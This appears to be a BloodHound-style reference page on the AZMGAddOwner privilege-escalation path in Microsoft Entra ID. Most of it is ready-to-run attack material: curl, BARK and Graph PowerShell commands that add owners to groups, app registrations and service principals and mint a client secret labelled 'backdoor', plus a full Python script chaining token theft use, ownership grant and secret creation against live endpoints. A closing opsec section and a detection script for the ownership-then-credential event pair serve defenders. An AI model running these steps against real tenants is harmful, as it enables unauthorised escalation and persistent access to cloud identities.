AZMGAddOwner

The source service principal holds MS Graph app roles (for example Application.ReadWrite.All, Group.ReadWrite.All or Directory.ReadWrite.All) that allow it to add owners to groups, app registrations, or service principals through the MS Graph API. Ownership is the escalation: an owner of an app registration or service principal can add credentials to it, and an owner of a group can manage its membership.

Applies to: AZServicePrincipal → AZGroup / AZApplication / AZServicePrincipal


Linux Abuse

Get client credentials token

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

Add owner to group (Graph API)

The new owner must be a user or a service principal, referenced as a directoryObjects URL. Graph answers 204 No Content on success and 400 if the principal is already an owner.

curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<new-owner-object-id>\"}"

Add owner to application (Graph API)

Use the app registration's object id here, not its appId (client id).

curl -s -X POST "https://graph.microsoft.com/v1.0/applications/<target-app-object-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<new-owner-object-id>\"}"

Add owner to service principal (Graph API)

curl -s -X POST "https://graph.microsoft.com/v1.0/servicePrincipals/<target-sp-object-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<new-owner-object-id>\"}"

Windows Abuse

BARK: add owner to Service Principal

$MGToken = Get-MSGraphTokenWithClientCredentials `
  -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
  -ClientSecret "asdf..." `
  -TenantName "contoso.onmicrosoft.com"

New-ServicePrincipalOwner `
  -ServicePrincipalObjectId "<target-sp-object-id>" `
  -NewOwnerObjectId "<new-owner-object-id>" `
  -Token $MGToken.access_token

BARK: add owner to App Registration

# -AppObjectId is the app registration's object id, not its appId
New-AppOwner `
  -AppObjectId "<target-app-object-id>" `
  -NewOwnerObjectId "<new-owner-object-id>" `
  -Token $MGToken.access_token

BARK: add owner to Group

New-GroupOwner `
  -GroupObjectId "<target-group-id>" `
  -NewOwnerObjectId "<new-owner-object-id>" `
  -Token $MGToken.access_token

Microsoft.Graph PowerShell

# Microsoft.Graph SDK v2 takes the token as a SecureString
$secureToken = ConvertTo-SecureString "<access-token>" -AsPlainText -Force
Connect-MgGraph -AccessToken $secureToken

# The new owner is passed as a directoryObjects reference
$ownerRef = @{ "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/<new-owner-object-id>" }

# Group owner
New-MgGroupOwnerByRef -GroupId <target-group-id> -BodyParameter $ownerRef

# Application owner (application object id, not appId)
New-MgApplicationOwnerByRef -ApplicationId <target-app-object-id> -BodyParameter $ownerRef

# Service principal owner
New-MgServicePrincipalOwnerByRef -ServicePrincipalId <target-sp-object-id> -BodyParameter $ownerRef

Post-Ownership Escalation

Once owner of an app registration, add a client secret and authenticate as its service principal. The secret value (SecretText) is returned only in this one response, so capture it:

$cred = Add-MgApplicationPassword -ApplicationId <target-app-object-id> `
  -PasswordCredential @{ DisplayName = "backdoor" }
$cred.SecretText   # use with the app's appId as client_id in a client-credentials grant

Owning a service principal directly lets you add a credential to the service principal object itself; owning a group lets you add members to it.
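The whole chain (client-credentials token, add owner, mint a secret on the newly owned app registration) as one script, added here as an example; it is not BloodHound's or BARK's code. The Graph v1.0 endpoints, request bodies and success status codes are the documented ones; the `transport` hook, the helper names and every placeholder or GUID are this example's own assumptions so the flow can be exercised offline.

```python
"""Chain the AZMGAddOwner abuse against Microsoft Graph: token, add owner, add secret.

Added example for this page; not BloodHound's or BARK's code. Graph v1.0 endpoints,
bodies and status codes are the documented ones. The `transport` hook, helper names
and placeholder ids are this example's own assumptions.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

GRAPH = "https://graph.microsoft.com/v1.0"

# Collection that exposes the /owners/$ref navigation for each target kind.
OWNER_COLLECTIONS = {
    "group": "groups",
    "application": "applications",
    "servicePrincipal": "servicePrincipals",
}


def http_transport(method, url, headers, body):
    """Send the request for real; returns (status_code, response_bytes)."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def get_token(tenant, client_id, client_secret, transport=http_transport):
    """Client-credentials grant as the source service principal (app-only token)."""
    url = f"https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"
    form = urllib.parse.urlencode({
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": "https://graph.microsoft.com/.default",
        "grant_type": "client_credentials",
    }).encode()
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    status, body = transport("POST", url, headers, form)
    if status != 200:
        raise RuntimeError(f"token request failed: HTTP {status} {body[:200]!r}")
    return json.loads(body)["access_token"]


def owner_ref(new_owner_object_id):
    """Body for POST .../owners/$ref: the new owner as a directoryObjects URL."""
    return {"@odata.id": f"{GRAPH}/directoryObjects/{new_owner_object_id}"}


def add_owner(token, kind, target_object_id, new_owner_object_id, transport=http_transport):
    """Make new_owner_object_id an owner of the group / application / servicePrincipal.

    target_object_id is the directory object id; for app registrations that is the
    application's object id, not its appId. Graph returns 204 No Content on success
    and 400 if the principal is already an owner.
    """
    url = f"{GRAPH}/{OWNER_COLLECTIONS[kind]}/{target_object_id}/owners/$ref"
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    payload = json.dumps(owner_ref(new_owner_object_id)).encode()
    status, body = transport("POST", url, headers, payload)
    if status != 204:
        raise RuntimeError(f"add owner failed: HTTP {status} {body[:200]!r}")
    return url


def add_application_password(token, app_object_id, display_name, transport=http_transport):
    """Post-ownership step: mint a client secret on the app registration you now own.

    POST /applications/{object-id}/addPassword returns the passwordCredential; its
    secretText is only ever returned in this response, so capture it here.
    """
    url = f"{GRAPH}/applications/{app_object_id}/addPassword"
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    payload = json.dumps({"passwordCredential": {"displayName": display_name}}).encode()
    status, body = transport("POST", url, headers, payload)
    if status != 200:
        raise RuntimeError(f"addPassword failed: HTTP {status} {body[:200]!r}")
    cred = json.loads(body)
    return cred["secretText"], cred["keyId"]


if __name__ == "__main__":
    # Assumed placeholders; the source SP needs e.g. Application.ReadWrite.All.
    tok = get_token("contoso.onmicrosoft.com", "<source-app-id>", "<source-secret>")
    add_owner(tok, "application", "<target-app-object-id>", "<new-owner-object-id>")
    secret, key_id = add_application_password(tok, "<target-app-object-id>", "backdoor")
    print(f"keyId={key_id} secretText={secret}")
```

The `transport` parameter exists so the request construction can be checked without a tenant; in use, leave it at the default and the script talks to login.microsoftonline.com and graph.microsoft.com directly. The secret it mints is used with the target app's appId (not the object id) as `client_id` in a second client-credentials grant.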


Opsec

  • Entra ID audit logs record every ownership addition: actor (user or service principal), target object, new owner, timestamp.
  • Activity names: "Add owner to application" / "Add owner to service principal" / "Add owner to group."
  • Owning an app registration enables client secret addition, which produces a second, distinct audit event ("Update application – Certificates and secrets management"); the pair, grant ownership then add a credential by the new owner, is what a defender will correlate on.
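Detection logic for the two-event chain described above, added here as an example; it is not BloodHound's or Microsoft's code. It reads records in the field layout of Microsoft Graph's /auditLogs/directoryAudits (activityDisplayName, activityDateTime, result, initiatedBy, targetResources). The sample records are constructed, and the rule that picks the new owner out of targetResources is this example's own heuristic, not a documented guarantee.

```python
"""Hunt for the AZMGAddOwner -> credential-add chain in Entra ID audit log exports.

Added example for this page. Field names follow Graph /auditLogs/directoryAudits;
the sample records are constructed and the owner-extraction rule is a heuristic.
"""
from datetime import datetime, timedelta

# Audit activity -> type of the object that gained an owner.
ADD_OWNER_EVENTS = {
    "Add owner to application": "Application",
    "Add owner to service principal": "ServicePrincipal",
    "Add owner to group": "Group",
}
# Activity logged when a secret or certificate is added to an app registration.
CREDENTIAL_EVENTS = {"Update application – Certificates and secrets management"}


def parse_time(value):
    """directoryAudits timestamps are ISO 8601 with a trailing Z."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def actor_id(record):
    """Object id of the principal that acted: a user, or an app via its service principal."""
    who = record.get("initiatedBy") or {}
    if who.get("user"):
        return who["user"].get("id")
    if who.get("app"):
        return who["app"].get("servicePrincipalId")
    return None


def split_owner_event(record):
    """Return (object that gained an owner, new owner) from an Add-owner record.

    Heuristic: the targetResource whose type matches the activity is the object;
    the remaining targetResource is the new owner. Ambiguous when an SP owns an SP.
    """
    kind = ADD_OWNER_EVENTS[record["activityDisplayName"]]
    resources = record.get("targetResources") or []
    target = next((r for r in resources if r.get("type") == kind), None)
    owner = next((r for r in resources if r is not target), None)
    return target, owner


def find_owner_then_credential(records, window_hours=24):
    """Flag: A adds O as owner of X, then O adds a credential to X within window_hours."""
    window = timedelta(hours=window_hours)
    ordered = sorted(records, key=lambda r: parse_time(r["activityDateTime"]))
    findings = []
    for i, rec in enumerate(ordered):
        if rec.get("activityDisplayName") not in ADD_OWNER_EVENTS or rec.get("result") != "success":
            continue
        target, owner = split_owner_event(rec)
        if not target or not owner:
            continue
        t0 = parse_time(rec["activityDateTime"])
        for later in ordered[i + 1:]:
            if parse_time(later["activityDateTime"]) - t0 > window:
                break  # ordered by time, nothing further can match
            touches_target = any(r.get("id") == target["id"]
                                 for r in later.get("targetResources") or [])
            if (later.get("activityDisplayName") in CREDENTIAL_EVENTS
                    and actor_id(later) == owner.get("id") and touches_target):
                findings.append({
                    "granted_by": actor_id(rec),
                    "new_owner": owner["id"],
                    "target": target["id"],
                    "owner_added_at": rec["activityDateTime"],
                    "credential_added_at": later["activityDateTime"],
                })
    return findings


def sample_records():
    """Constructed records: an automation SP grants ownership, the new owner mints a secret."""
    return [
        {"activityDisplayName": "Add owner to application", "activityDateTime": "2024-05-01T10:00:00Z",
         "result": "success",
         "initiatedBy": {"app": {"displayName": "automation-sp", "servicePrincipalId": "sp-1111"}},
         "targetResources": [{"id": "user-2222", "type": "User"},
                             {"id": "app-3333", "type": "Application", "displayName": "payroll-api"}]},
        {"activityDisplayName": "Update application – Certificates and secrets management",
         "activityDateTime": "2024-05-01T10:07:00Z", "result": "success",
         "initiatedBy": {"user": {"id": "user-2222", "userPrincipalName": "mallory@contoso.com"}},
         "targetResources": [{"id": "app-3333", "type": "Application", "displayName": "payroll-api"}]},
        # Benign: an unrelated admin rotates a secret on the same app two days later.
        {"activityDisplayName": "Update application – Certificates and secrets management",
         "activityDateTime": "2024-05-03T09:00:00Z", "result": "success",
         "initiatedBy": {"user": {"id": "user-9999"}},
         "targetResources": [{"id": "app-3333", "type": "Application"}]},
    ]
```

Run `find_owner_then_credential(sample_records())` against a real export by loading the `value` array returned by `GET /auditLogs/directoryAudits` instead of the constructed list; the 24-hour window is a tuning knob, and the owner-extraction heuristic should be checked against your tenant's records before relying on it for service-principal-owns-service-principal cases.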